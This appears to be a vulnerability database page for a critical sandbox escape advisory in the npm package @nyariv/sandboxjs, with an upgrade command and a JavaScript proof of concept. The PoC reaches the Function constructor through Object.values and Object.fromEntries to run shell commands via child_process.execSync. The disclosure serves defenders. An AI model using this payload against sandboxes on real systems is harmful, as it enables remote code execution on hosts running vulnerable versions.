VDB
Sign up
CRITICAL10.0

GHSA-6r9f-759j-hjgv

SandboxJS affected by a Sandbox Escape

Quick fix

GHSA-6r9f-759j-hjgv — @nyariv/sandboxjs: upgrade to the fixed version with the command below.

npm install @nyariv/sandboxjs@0.8.34

Details

### Summary

It is possible to obtain arrays containing `Function`, which allows escaping the sandbox.

### Details

There are various ways to get an array containing `Function`, e.g.

```js Object.entries(this).at(1) // [ 'Function', [Function: Function] ] Object.values(this).slice(1, 2) // [ [Function: Function] ] ```

Given an array containing `Function`, and `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox.

### PoC ```js const s = require('.').default; const sb = new s();

payload = ` const p = (async function () {})(); ({ "finally": p.finally, ...Object.fromEntries([['then', ...Object.values(this).slice(1)]]), }).finally('a=process.getBuiltinModule("child_process").execSync("ls", {stdio: "inherit"})')(); `;

sb.compile(payload)().run(); ```

### Impact

Sandbox Escape -> RCE

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@nyariv/sandboxjs
Introduced in: 0Fixed in: 0.8.34
Fixnpm install @nyariv/sandboxjs@0.8.34

References